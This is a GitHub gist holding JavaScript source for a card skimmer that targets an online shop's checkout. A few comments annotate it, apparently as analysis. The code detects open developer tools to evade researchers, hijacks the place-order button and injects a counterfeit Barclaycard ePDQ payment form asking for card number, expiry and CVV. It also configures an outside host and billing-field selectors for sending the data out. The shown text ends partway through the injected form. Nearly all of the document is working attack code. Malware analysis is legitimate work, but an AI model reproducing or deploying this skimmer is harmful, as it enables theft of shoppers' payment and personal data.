-
-
Save krautface/4ffef78eda7d907587e67f08ef31112c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function checkForDevTools() | |
{ | |
'use strict'; | |
var devToolsState = { | |
'open': ![], | |
'orientation': null | |
}, | |
_0x4605dc = 160, | |
devChange = function (open, orientation) | |
{ | |
window['dispatchEvent'](new CustomEvent('devtoolschange', | |
{ | |
'detail': | |
{ | |
'open': open, | |
'orientation': orientation | |
} | |
})); | |
}; | |
setInterval(function () | |
{ | |
var widthGap = window['outerWidth'] - window['innerWidth'] > 160, | |
heightGap = window['outerHeight'] - window['innerHeight'] > 160, | |
orientation = widthGap ? 'vertical' : 'horizontal'; | |
!(heightGap && widthGap) && (window['Firebug'] && window['Firebug']['chrome'] && window['Firebug']['chrome']['isInitialized'] || widthGap || heightGap) ? ((!devToolsState['open'] || devToolsState['orientation'] !== orientation) && devChange(!![], orientation), devToolsState['open'] = !![], devToolsState['orientation'] = orientation) : (devToolsState['open'] && devChange(![], null), devToolsState['open'] = ![], devToolsState['orientation'] = null); | |
}, 100), typeof module !== 'undefined' && module['exports'] ? module['exports'] = devToolsState : window['devtools'] = devToolsState; | |
} | |
checkForDevTools() | |
function skimmer() | |
{ | |
const paymentInjectConfig = { | |
'frame_id': '#barclaycardcw_payment', | |
'radio': '#p_method_barclaycardcw_creditcard', | |
'final_cookie': 'mage-checkout-mc', | |
'data_atr': 'data-checkout', | |
'data_val': 'true', | |
'sendbtn': '#submit3', | |
'cnum': '#Ecom_Payment_Card_Number', | |
'expm': '#Ecom_Payment_Card_ExpDate_Month', | |
'expy': '#Ecom_Payment_Card_ExpDate_Year', | |
'cvv': '#Ecom_Payment_Card_Verification', | |
'origbtn': 'button#aw-onestepcheckout-place-order-button', | |
'fbtn': '#aw-onestepchecout-place-order-button', | |
'loader': '.aw-onestepcheckout-place-order-please-wait' | |
}, | |
exfilConfig = { | |
'url': 'https://livechatlnc.com/checkouts.js', | |
'adr': 'input[name="billing[street][]"]', | |
'cnm': 'input[name="billing[firstname]"]', | |
'cna': 'input[name="billing[lastname]"]', | |
'eml': 'input[name="billing[email]"]', | |
'phn': 'input[name="billing[telephone]"]', | |
'cit': 'input[name="billing[city]"]', | |
'sta': 'select[name="billing[region_id]"]', | |
'cnt': 'select[name="billing[country_id]"]', | |
'zip': 'input[name="billing[postcode]"]', | |
'shp': window['location']['host'] | |
}, | |
// Check to see if the "button#aw-onestepcheckout-place-order-button" is present | |
// and has a 'data-checkout' attribute set | |
// If it does, grab it and set the 'data-checkout' attribute to 'true' | |
// Then clone the button and replace it with the clone | |
// Then add a new onclick event which will inject a malicious payment form | |
bindButton = () => | |
{ | |
if (getSelector(paymentInjectConfig['origbtn']) && !getSelector(paymentInjectConfig['origbtn'])['hasAttribute'](paymentInjectConfig['data_atr'])) | |
{ | |
getSelector(paymentInjectConfig['origbtn'])['setAttribute'](paymentInjectConfig['data_atr'], paymentInjectConfig['data_val']); | |
let origbtn = getSelector(paymentInjectConfig['origbtn']), | |
newButton = origbtn['cloneNode'](true); | |
origbtn['parentNode']['replaceChild'](newButton, origbtn), getSelector(paymentInjectConfig['origbtn'])['addEventListener']('click', () => | |
{ | |
getSelector(paymentInjectConfig['origbtn'])['setAttribute']('disabled', 'disabled'), setTimeout(() => | |
{ | |
injectForm(); | |
}, 2000); | |
}); | |
} | |
}; | |
checkRsrch = () => | |
{ | |
// if not Mobile and devtools are open | |
// set a cookie of the name "mage-checkout-mc" (from the paymentInjectConfig) | |
// with an expiration date five days in the future and a random value and then reload the page | |
if (navigator['userAgent']['indexOf']('Mobile') == -1 && window['devtools']['open'] === true) { | |
setCookie(paymentInjectConfig['final_cookie'], Math['floor'](0x5f5e100 + Math['random']() * 0x35a4e900), 5); | |
window['location']['reload'](); | |
} | |
}, | |
// Every 500ms, check if the "final_cookie" (which is named mage-checkout-mc) is set | |
// If it is, do nothing | |
// If not, call checkRsrch to see if devtools are open or if they're on mobile | |
// If it's not, check to see if the URL contains 'onestepcheckout' | |
// If it does, check again if the useragent includes Mobile (??) | |
// This is a bug in this version of the skimmer. Newer versions have fixed this | |
setInterval(() => | |
{ | |
if (getCookie(paymentInjectConfig['final_cookie'])) return; | |
checkRsrch(); | |
if (!new RegExp('onestepcheckout')['test'](window['location'])) return; | |
if (navigator['userAgent']['includes']('Mobile')) { | |
// if the "p_method_barclaycardcw_creditcard" radio button is selected | |
// then check to see if the "button#aw-onestepcheckout-place-order-button" is present | |
if (getSelector(paymentInjectConfig['radio']) && getSelector(paymentInjectConfig['radio'])['checked']) { | |
if (getSelector(paymentInjectConfig['origbtn'])) { | |
bindButton() | |
} | |
} | |
} | |
}, 500); | |
const _0x5d7a20 = function (_0x289964) | |
{ | |
return new Promise((_0x481c9b, _0x4c4d39) => | |
{ | |
var _0x56281e = _0x252a; | |
let _0x548c2c = 'z-index: 999999;display: none;width:100%;height: 200vh;border: none;', | |
_0x295a15 = '<iframe id="' + _0x289964['replace']('#', '') + '" frameborder="0" style="' + _0x548c2c + '"></iframe>'; | |
!document['querySelector'](_0x289964) && (document['querySelector']('body')['insertAdjacentHTML']('afterbegin', _0x295a15), _0x481c9b(document['querySelector'](_0x289964))); | |
}); | |
}, | |
_0x1a1ea7 = () => | |
{ | |
getSelector('#chat-widget-container') ? getSelector('#chat-widget-container')['style']['display'] = 'none' : ![], getSelector('.wrapper') ? getSelector('.wrapper')['style']['display'] = 'none' : ![]; | |
}, | |
injectForm = () => | |
{ | |
var _0x27403d = _0x2adc58; | |
let _0x38be75 = Math['ceil'](Math['random']() * 0x989680), | |
_0x10b989 = getSelector('span.aw-onestepcheckout-place-order-amount')['innerText']['substr'](0x1), | |
_0x25d16f = `\x0a\x09\x09<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\x0a\x09\x09<html>\x0a\x09\x09 <!-- ePDQ static template -->\x0a\x09\x09 <head>\x0a\x09\x09\x09<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\" />\x0a\x09\x09\x09<title>Payment confirmation</title>\x0a\x09\x09\x09<style type=\"text/css\">\x0a\x09\x09\x09 td.ncolh1 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtl {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: right;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtl2 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: right;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtr {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtc {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: center;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncollogol {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: right;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncollogor {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncollogoc {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: center;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtmessage {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncolinput {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncolline1 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncolline2 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 input.ncol {\x0a\x09\x09\x09\x09background-color: darkblack;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 input.numberLtr {\x0a\x09\x09\x09\x09direction: ltr;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable1 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09border: 1px solid #000000;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable2 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09border: 1px solid #000000;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable3 {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09border: 1px solid #000000;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable1 td {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable2 td {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 table.ncoltable3 td {\x0a\x09\x09\x09\x09background-color: #ffffff;\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09font-family: Verdana;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 a {\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09\x09text-decoration: underline;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 p {\x0a\x09\x09\x09\x09color: #000000;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td {\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDtxt {\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-left: 2em;\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDlabel {\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-left: 4em;\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDdata {\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .MKtxt {\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09margin-left: 2em;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .MKlabel {\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-left: 4em;\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09font-style: italic;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 td.ncoltxtr p.MKlabel {\x0a\x09\x09\x09\x09margin-left: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .MKdata {\x0a\x09\x09\x09\x09font-weight: normal;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDimp {\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09margin-left: 2em;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-top: 0;\x0a\x09\x09\x09 }\x0a\x09\x09\x09 .DDsection {\x0a\x09\x09\x09\x09font-weight: bold;\x0a\x09\x09\x09\x09margin-left: 0em;\x0a\x09\x09\x09\x09text-align: left;\x0a\x09\x09\x09\x09margin-top: 1em;\x0a\x09\x09\x09\x09margin-bottom: 0em;\x0a\x09\x09\x09 }\x0a\x09\x09\x09</style>\x0a\x09\x09 </head>\x0a\x09\x09\x0a\x09\x09 <body text=\"#000000\" bgcolor=\"#FFFFFF\">\x0a\x09\x09\x0a\x09\x09\x09<div id=\"over_pay\" style=\"display:none; position: absolute;width: 100%;height: 200%;background-color: #fff;opacity: .5;z-index: 999;\"></div>\x0a\x09\x09\x0a\x09\x09\x09<table width=\"100%\" border=\"0\">\x0a\x09\x09\x09 <tbody>\x0a\x09\x09\x09\x09<tr>\x0a\x09\x09\x09\x09 <td width=\"15%\"></td>\x0a\x09\x09\x09\x09 <td width=\"70%\">\x0a\x09\x09\x09\x09\x09<div align=\"center\">\x0a\x09\x09\x09\x09\x09 <font size=\"4\" face=\"Verdana\"><strong>Payment confirmation</strong></font>\x0a\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09\x09<br />\x0a\x09\x09\x0a\x09\x09\x09\x09\x09<!-- Order overview -->\x0a\x09\x09\x09\x09\x09<h2 style=\"display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;\">Order overview</h2>\x0a\x09\x09\x09\x09\x09<table class=\"ncoltable1\" id=\"ncol_ref\" width=\"95%\" cellspacing=\"0\" cellpadding=\"2\" border=\"0\">\x0a\x09\x09\x09\x09\x09 <tbody>\x0a\x09\x09\x09\x09\x09\x09<tr>\x0a\x09\x09\x09\x09\x09\x09 <td class=\"ncoltxtl\" colspan=\"1\" width=\"50%\" align=\"right\">\x0a\x09\x09\x09\x09\x09\x09\x09<small>Order reference :<!--External reference--></small>\x0a\x09\x09\x09\x09\x09\x09 </td>\x0a\x09\x09\x09\x09\x09\x09 <td class=\"ncoltxtr\" colspan=\"1\" width=\"50%\"><small>order_' + _0x38be75 + '</small></td> | |
</tr> | |
<tr> | |
<td class="ncoltxtl" colspan="1" width="50%" align="right"> | |
<small> Total charge :<!--Total to pay--> </small> | |
</td> | |
<td class="ncoltxtr" colspan="1" width="50%"> | |
<small>' + _0x10b989 + ' GBP </small> | |
</td> | |
</tr> | |
<tr> | |
<td class="ncoltxtl" colspan="1" align="right"> | |
<small>Beneficiary :<!--Beneficiary--></small> | |
</td> | |
<td class="ncoltxtr" colspan="1"><small>Designer Stone Shower Trays Ltd</small></td> | |
</tr> | |
</tbody> | |
</table> | |
<style type="text/css"> | |
.sectionTitle { | |
font-weight: bold; | |
text-align: center; | |
vertical-align: baseline; | |
font-size: small; | |
padding: 10px; | |
text-decoration: underline; | |
} | |
.fieldTitle { | |
font-weight: bold; | |
text-align: right; | |
vertical-align: baseline; | |
font-size: small; | |
padding: 3px; | |
} | |
.fieldValue { | |
text-align: left; | |
vertical-align: baseline; | |
font-size: small; | |
padding: 3px; | |
} | |
.star { | |
font-size: 10px; | |
} | |
.note { | |
font-size: 10px; | |
padding: 3px; | |
} | |
.tc { | |
font-size: 10px; | |
padding: 5px; | |
} | |
.justify { | |
text-align: justify; | |
} | |
</style> | |
<div class="kaxsdc" data-event="load"></div> | |
<p></p> | |
<!-- Hidden title for screenreaders (Payment Data) --> | |
<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;">Payment data</h2> | |
<table id="step1" class="ncoltable2" width="95%" cellspacing="0" cellpadding="2" border="0"> | |
<tbody> | |
<tr> | |
<td class="ncolh1" rowspan="1" colspan="3" valign="top" align="center"> | |
<b> | |
<small>Please select a payment method by clicking on the logo.<!--Payment method--></small> | |
</b> | |
</td> | |
</tr> | |
<tr> | |
<td colspan="1" class="ncolline1" width="5%" valign="top" align="left"> </td> | |
<td colspan="1" class="ncolline1" width="45%" valign="center" align="right"> | |
<small> | |
<small><span class="1"> VISA</span></small> | |
</small> | |
</td> | |
<td colspan="1" class="ncolline1" valign="top" align="left"> | |
<input type="image" name="VISA_brand" src="https://payments.epdq.co.uk/images/VISA_choice.gif" alt="VISA" title="VISA" class="NCOLINIM" style="margin: 3px;" align="middle" /><input type="hidden" name="paymethod" value="CreditCard" /> | |
</td> | |
</tr> | |
<tr> | |
<td colspan="1" class="ncolline2" width="5%" valign="top" align="left"> </td> | |
<td colspan="1" class="ncolline2" width="45%" valign="center" align="right"> | |
<small> | |
<small><span class="1"> JCB</span></small> | |
</small> | |
</td> | |
<td colspan="1" class="ncolline2" valign="top" align="left"> | |
<input type="image" name="JCB_brand" src="https://payments.epdq.co.uk/images/JCB_choice.gif" alt="JCB" title="JCB" class="NCOLINIM" style="margin: 3px;" align="middle" /> | |
</td> | |
</tr> | |
<tr> | |
<td colspan="1" class="ncolline1" width="5%" valign="top" align="left"> </td> | |
<td colspan="1" class="ncolline1" width="45%" valign="center" align="right"> | |
<small> | |
<small><span class="1"> MasterCard</span></small> | |
</small> | |
</td> | |
<td colspan="1" class="ncolline1" valign="top" align="left"> | |
<input type="image" name="Eurocard_brand" src="https://payments.epdq.co.uk/images/Eurocard_choice.gif" alt="MasterCard" title="MasterCard" class="NCOLINIM" style="margin: 3px;" align="middle" /> | |
</td> | |
</tr> | |
<tr> | |
<td colspan="1" class="ncolline2" width="5%" valign="top" align="left"> </td> | |
<td colspan="1" class="ncolline2" width="45%" valign="center" align="right"> | |
<small> | |
<small><span class="2"> Maestro</span></small> | |
</small> | |
</td> | |
<td colspan="1" class="ncolline2" valign="top" align="left"> | |
<input type="image" name="Maestro_brand" src="https://payments.epdq.co.uk/images/Maestro_choice.gif" alt="Maestro" title="Maestro" class="NCOLINIM" style="margin: 3px;" align="middle" /> | |
<small> | |
<small> | |
<a | |
href="https://payments.epdq.co.uk/info.asp?product=MAYIPAYMAESTRO1&CSRFSP=%2Fncol%2Fprod%2Forderstandard%5Futf8%2Easp&CSRFKEY=146A825D5D6C59C66B7C26EEED5AED64EF3BB809&CSRFTS=20210622191821" | |
target="POPUP" | |
onclick="openPOPUP(this,'');return false" | |
> | |
Can I actually pay with my Maestro card? | |
</a> | |
<script type="text/JavaScript"> | |
<!--// | |
function openPOPUP(lien,l_features) | |
{ | |
var theURL, winName | |
theURL = lien.href; | |
winName= lien.target; | |
NewWindow = window.open(theURL,winName,l_features); | |
NewWindow.focus(); | |
} | |
//--> | |
</script> | |
</small> | |
</small> | |
</td> | |
</tr> | |
</tbody> | |
</table> | |
<table id="step2" class="ncoltable2" width="95%" cellspacing="0" cellpadding="2" border="0" style="display: none;"> | |
<tbody> | |
<tr> | |
<td class="ncoltxtl2" width="50%" valign="top" align="right"> | |
<small> | |
Pay with<!--Credit card--> | |
: | |
</small> | |
</td> | |
<td class="ncolinput" width="50%" valign="top" nowrap="" align="left"> | |
<img id="cardtypeimg" src="https://payments.epdq.co.uk/images/Eurocard_choice.gif"> | |
</td> | |
</tr> | |
<tr> | |
<td class="ncoltxtl2" align="right"> | |
<small> | |
<label for="Ecom_Payment_Card_Name">Cardholder's name*</label> | |
<!--Card holder name--> | |
: | |
</small> | |
</td> | |
<td class="ncolinput"> | |
<small><input type="text" name="Ecom_Payment_Card_Name" id="Ecom_Payment_Card_Name" maxlength="35" size="20" value="" aria-required="true" /></small> | |
</td> | |
</tr> | |
<tr> | |
<td class="ncoltxtl2" align="right"> | |
<small> | |
<label for="Ecom_Payment_Card_Number"> | |
Card number* | |
</label> | |
<!--Card number--> | |
: | |
</small> | |
</td> | |
<td class="ncolinput"> | |
<small> | |
<input name="Ecom_Payment_Card_Number" id="' + paymentInjectConfig['cnum']['replace']('#', '') + '" autocomplete="Off" maxlength="20" size="20" type="text" class="numberLtr" aria-required="true" /> | |
</small> | |
</td> | |
</tr> | |
<tr> | |
<td class="ncoltxtl2" align="right"> | |
<small> <label for="Ecom_Payment_Card_ExpDate_Month"> Expiry date (mm</label>/<label for="Ecom_Payment_Card_ExpDate_Year">yyyy)* </label> :</small> | |
</td> | |
<td class="ncolinput"> | |
<small> | |
<select | |
id="' + paymentInjectConfig['expm']['replace']('#', '') + '" | |
name="Ecom_Payment_Card_ExpDate_Month" | |
size="1" | |
title=" Expiry date (mm/yyyy) (month)" | |
> | |
<option value=""></option> | |
<option value="01">01</option> | |
<option value="02">02</option> | |
<option value="03">03</option> | |
<option value="04">04</option> | |
<option value="05">05</option> | |
<option value="06">06</option> | |
<option value="07">07</option> | |
<option value="08">08</option> | |
<option value="09">09</option> | |
<option value="10">10</option> | |
<option value="11">11</option> | |
<option value="12">12</option> | |
</select> | |
/ | |
<select | |
id="' + paymentInjectConfig['expy']['replace']('#', '') + '\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09 name=\"Ecom_Payment_Card_ExpDate_Year\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09 size=\"1\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09 title=\" Expiry date (mm/yyyy) (year)\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"\"></option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2021\">2021</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2022\">2022</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2023\">2023</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2024\">2024</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2025\">2025</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2026\">2026</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2027\">2027</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2028\">2028</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2029\">2029</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2030\">2030</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2031\">2031</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2032\">2032</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2033\">2033</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2034\">2034</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2035\">2035</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2036\">2036</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2037\">2037</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2038\">2038</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2039\">2039</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2040\">2040</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2041\">2041</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2042\">2042</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2043\">2043</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2044\">2044</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2045\">2045</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <option value=\"2046\">2046</option>\x0a\x09\x09\x09\x09\x09\x09\x09\x09</select>\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x09\x09\x09\x09\x09</td>\x0a\x09\x09\x09\x09\x09\x09 </tr>\x0a\x09\x09\x0a\x09\x09\x09\x09\x09\x09 <tr id=\"cvc_dob_row\">\x0a\x09\x09\x09\x09\x09\x09\x09<td class=\"ncoltxtl2\" align=\"right\">\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<label id=\"lbl_ecom_payment_card_identification\" for=\"Ecom_Payment_Card_Verification\" style=\"display: none;\">Card verification code* :</label>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<label id=\"lbl_cvc\" for=\"Ecom_Payment_Card_Verification\">Card verification code* :</label>\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x09\x09\x09\x09\x09</td>\x0a\x09\x09\x0a\x09\x09\x09\x09\x09\x09\x09<td class=\"ncolinput\">\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<input type=\"text\" name=\"Ecom_Payment_Card_Verification\" id=\"' + paymentInjectConfig['cvv']['replace']('#', '') + '\" autocomplete=\"Off\" size=\"10\" maxlength=\"10\" aria-required=\"true\" value=\"\" />\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <a\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09class=\"midncol\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09href=\"https://payments.epdq.co.uk/ncol/prod/card_verification_code.asp?lang=1&ABRAND=%3BEurocard&CSRFSP=%2Fncol%2Fprod%2Forderstandard%5FUTF8%2Easp&CSRFKEY=0DB07C8D07D7BD54FAAE145D572742B038CD0AA2&CSRFTS=20210622191938\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09target=\"popup\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09onclick=\"window.open(\'\',\'popup\',\'width=300,height=400,left=0,top=0,scrollbars=1\')\"\x0a\x09\x09\x09\x09\x09\x09\x09\x09 >\x0a\x09\x09\x09\x09\x09\x09\x09\x09\x09What is this?\x0a\x09\x09\x09\x09\x09\x09\x09\x09 </a>\x0a\x09\x09\x09\x09\x09\x09\x09\x09</small>\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x09\x09\x09\x09\x09</td>\x0a\x09\x09\x09\x09\x09\x09 </tr>\x0a\x09\x09\x0a\x09\x09\x09\x09\x09\x09 <tr>\x0a\x09\x09\x09\x09\x09\x09\x09<td colspan=\"2\" valign=\"middle\" align=\"center\">\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09 * Mandatory fields\x0a\x09\x09\x09\x09\x09\x09\x09\x09 <br />\x0a\x09\x09\x09\x09\x09\x09\x09\x09</small>\x0a\x09\x09\x09\x09\x09\x09\x09 </small>\x0a\x09\x09\x09\x09\x09\x09\x09</td>\x0a\x09\x09\x09\x09\x09\x09 </tr>\x0a\x09\x09\x09\x09\x09\x09 <tr align=\"center\">\x0a\x09\x09\x09\x09\x09\x09\x09<td colspan=\"2\" valign=\"middle\" align=\"center\">\x0a\x09\x09\x09\x09\x09\x09\x09 <small>\x0a\x09\x09\x09\x09\x09\x09\x09\x09<input type=\"button\" class=\"ncol\" name=\"payment\" value=\"Yes, I confirm my payment\" id=\"' + paymentInjectConfig['sendbtn']['replace']('#', '') + '" /> | |
</small> | |
</td> | |
</tr> | |
</tbody> | |
</table> | |
<!-- Further information / Cancel --> | |
<h2 style="display: inline; position: absolute; left: -1000px; top: -1000px; width: 0px; height: 0px; overflow: hidden;">Further information / Cancel</h2> | |
<table class="ncoltable3" id="ie_cc" style="behavior: url(#default#clientCaps);margin-top: 20px;" width="95%" cellspacing="0" cellpadding="2" border="0"> | |
<tbody> | |
<tr> | |
<td class="ncollogoc" width="33%" valign="middle" align="center"> | |
<a href="https://www.mastercard.us/en-us/frequently-asked-questions.html#securecode" target="_blank"> | |
<img id="botpic" src=""> | |
</a> | |
</td> | |
<td class="ncollogoc" width="33%" valign="middle" align="center"> | |
<img src="https://payments.epdq.co.uk/images/EPDQ_BOLogoPowered.png"> | |
<br /> | |
<small><small></small></small> | |
</td> | |
<td class="ncollogoc" width="33%" valign="middle" align="center"></td> | |
</tr> | |
<tr> | |
<td class="ncollogoc" colspan="3" align="center"> | |
<center> | |
<table cellspacing="0" cellpadding="0" border="0"> | |
<tbody> | |
<tr> | |
<td class="ncollogoc" width="50%" align="center"> | |
